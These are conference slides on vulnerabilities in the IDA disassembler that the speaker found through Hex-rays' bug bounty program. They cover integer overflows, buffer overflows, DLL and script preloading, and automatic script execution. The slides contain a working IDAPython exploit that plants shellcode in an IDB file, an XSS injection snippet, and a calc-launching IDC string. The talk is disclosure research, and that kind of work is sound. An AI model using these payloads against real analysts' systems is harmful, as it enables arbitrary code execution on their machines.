Post on 22-Nov-2014
description
IDA’s Vulnerabilities and Bug Bounty Program
Masaaki Chida
Profile ! Security Engineer
! Interested in Reverse Engineering
! Participant in the sutegoma2 CTF team
What is IDA? ! Fully Featured Disassembler
! Static analysis software used for analyzing malware etc.
! Hex-rays’ Bug Bounty Program ! 3000 USD Reward ! Rewards for remote attacks against IDA and the Hex-rays
Decompiler ! Started around February 2011 ! By January 2014, there were 11 bounties awarded
https://www.hex-rays.com/bugbounty.shtml
Bug Bounty Program Impressions ! Identified various types of vulnerabilities, more than
expected ! Hex-rays responded rapidly
! During normal business hours, email replies were immediate ! They also sent patches if the fixes were quick
! Parts that were difficult ! Creating the proof of concept exploit code
! Reproducing file formats ! Writing reports
! English ! Writing vulnerability details for people other than security engineers
Research Methodology ! Analysis in IDA
! IDA Main Program (for windows) ! Loader Modules ! Processor Modules ! Plugins
! Read the SDK plugins’ source code
! Observed the running processes’ actions ! Sysinternals Tools: Procmon
Investigating functions that handle IO ! Data Read & Copy
! read, lread, eread, qread, qlread, qfread, ! memcpy, strcpy, strncpy, qstrncpy, …
! IDB Database ! get_long, get_byte, ger_many_bytes, ! netnode_getblob, netnode_altval, netnode_supval, ! unpack_dd, unpack_ds, unpack_dw, …
! Heap Allocation ! malloc, calloc, realloc ! qalloc, qcalloc, qrelloc ! qvecto_reserve
Script and command execution functions
! IDC Script ! CompileEx, CompileLineEx ! str2ea, calcexpr, calcexpr_long, calc_idc_expr, ! Eval, ExecIDC, Execute File, Execute Line,…
! Command Execution ! call_system ! system, CrateProcess,…
Summary of Identified IDA Vulnerabilities
! Heap Overflow => Many ! Stack Overflow => 2 ! DLL, Script Preloading => Many ! Path Traversal => Several ! Automatic IDC script execution ! Automatic debugger execution
! ※These include bugs that were not eligible for bounty rewards
Integer Overflow Vulnerabilities ! Problems
! Almost all modules were a target ! No integer overflow protections ! Even functions like qcalloc were unprotected
By exploiting buffer overflows it is possible to execute arbitrary code in many of the modules
void *__cdecl qcalloc(size_t nitems, size_t itemsize) { void *result; // eax@2 void *v3; // ebx@3 if ( (signed int)(itemsize * nitems) > 0 ) { v3 = calloc(itemsize * nitems, 1u);
Integer Signedness Vulnerability ! Problem
! Target was the AIF Loader Module ! Stack buffer overflow occurs during analysis of the section
name
By exploiting the stack based buffer overflow it was possible to execute arbitrary code.
Classic Buffer Overflow Vulnerabilities ! Problems
! Target was the .NET Processor Module ! Binary to hex string conversion process
! netnode_getblob() did not validate the size of the input data
By exploiting stack based buffer overflows it was possible to execute arbitrary code
Classic Buffer Overflow Vulnerability
! #For Windows XP SP3 Japanese Edition
! from idaapi import *;from struct import *
! a = 0x5874768A-0x24; b = 0x5874764A-0x14
! shellcode="htIIGX5tIIGHWPPPSRPPafhExfXf5YrfPDfhS3DTY09fhpzfXf5rRfPDTY01fRDfhpQDTY09fh3NfXf50rfPfharfXf5dsfPDTY09hBzPKX5ceLJPDfhptDfh9tDTY01fh6OfXf5jAfPDTY09hinEufhKWDfhkdfXf5WcfPfhnLfXf5g2fPDTY09fhgRDTY01fhQBfhdtfXf5QXfPDfhlHDTY09fhaefXf57jfPDfh5PfXf5lVfPDTY09h7YqoX5RFUnPDfhjLDfhttDTY09fh8wfXf5PvfPDTY09h3YIXX54FiYPDfhatDfhgtDTY01fh7xDfh8pfXf5dofPfhitDTY09fhlzfXf53FfPfhYtDTY09fhGSfXf59KfPfhWtDTY01fhG0DfhRtTYf19fh3ZfXf55VfPDfhnvDfh5tDTY01fh6tfXf5FxfPDfhRvDfhJtDTY09fhr0fhCtDTY01hJRVdDfhlKfXf5MRfPDTY09fhUvDTY09fhmwDfhB4fXf5xhfPhdohchshinfhUifXf5C5fPDhehwshhystfhYjfXf5I6fPDhhm32hcalchexehfhTHfXf54ffPDfhRhfhKifXf5YDfPDTY09fhU1DRVWRTFfVNfhjsfXf5ErfPVUafhrWfYf1Lo9f1To9TXLLLrH“
! payload=("1"*8)+(pack("II",a,b)*(9334/8-1))+("\x55"*6)
! payload+=shellcode
! payload+=("1"*((len(shellcode)&4)+10-(len(shellcode)%4)))+(pack("II",a,b)*(16000/8))
! node_id=netnode("$ cli").altval(0x0C000014,'o')
! netnode(node_id).setblob(payload,0,'o')
! IDAPython script that inserts shellcode into an IDB file
HTML Injection Vulnerability ! Problem
! Possible to inject arbitrary HTML when exporting analysis to HTML
! HTML entities were not being escaped ! get_root_filename function
! Qbasename function exhibits odd behavior ! Calling qbasename(“\x00:/path/filename”) returns “/path/filename”
Possible to execute XSS when opening the generated HTML file
from idaapi import * node=netnode("Root Node") node.set(“\x00:</title><scritp>alert('XSS')</script>") save_database()
Preloading Vulnerability ! Problem
! Automatically loads DLLs, IDC and IDAPython scripts from the same directory containing the IDB file ! ida.idc, userload.idc ! windbg.exe, dbghelp.dll, dbgeng.dll, … ! idautils.py, idc.py, idaapi.py, …
Possible to automatically read/execute unintended files, allowing for arbitrary code execution
Problems with Debugger Settings ! Problem
! Debug target applications can be UNC paths ! The flag to ignore debugger startup warnings is saved in the
IDB file
Possible to run a malicious remote file without any warning messages using the runtime debugger
Automatic Debugger Execution Vulnerability
! Problem ! Debugger is automatically run during memory dump analysis ! Automatic evaluation of debugger events
! Event Condition, Watch Point View
Possible to execute malicious IDC script when loading an IDB file made from a memory dump
Automatic IDC Script Execution Vulnerability
! Problem ! Target was the .NET Processor Module ! Using IDA’s hint dialog
! 1. get string of text below the line of the cursor ! 2. Pass it to the extract_name function ! 3. Pass it to the str2ea function
! Behavior of the extract_name function is different ! Control characters present in the NameChars item within ida.cfg
! IDC Script is implicitly run from the str2ea function parameters
Possible to execute malicious script when parsing .NET files
str2ea
calcexpr_long
calc_idc_expr
CompileLineEx
Run
Behavioral Differences in extract_name [X86, ARM Processor Module, etc…]
Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0) Exec --------------------------------------------------------------- .text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, … .text:00401000 db 'Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))',0
[.NET Processor Module]
Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0) Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63)) --------------------------------------------------------------- .method private static hidebysig void Main(string[] args) { ldstr "Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))“ }
When positioning the cursor over ”db ‘Exec(char(0x63…” in x86, nothing occurs. Internally, str2ea(‘Exec’) is executed.
However, in .NET moving the cursor over ”ldstr “Exec(char(0x63…” causes calc to be popped. Internally, str2ea(‘Exec(“calc”)’) is executed.
DEMO
Summary ! Lots of easy to find vulnerabilities still exist
! I think bug bounty programs help in reducing vulnerability
! I want there to be more bug bounty programs
! There are other bug bounty programs already running
! Those who are interested should join!
Q&A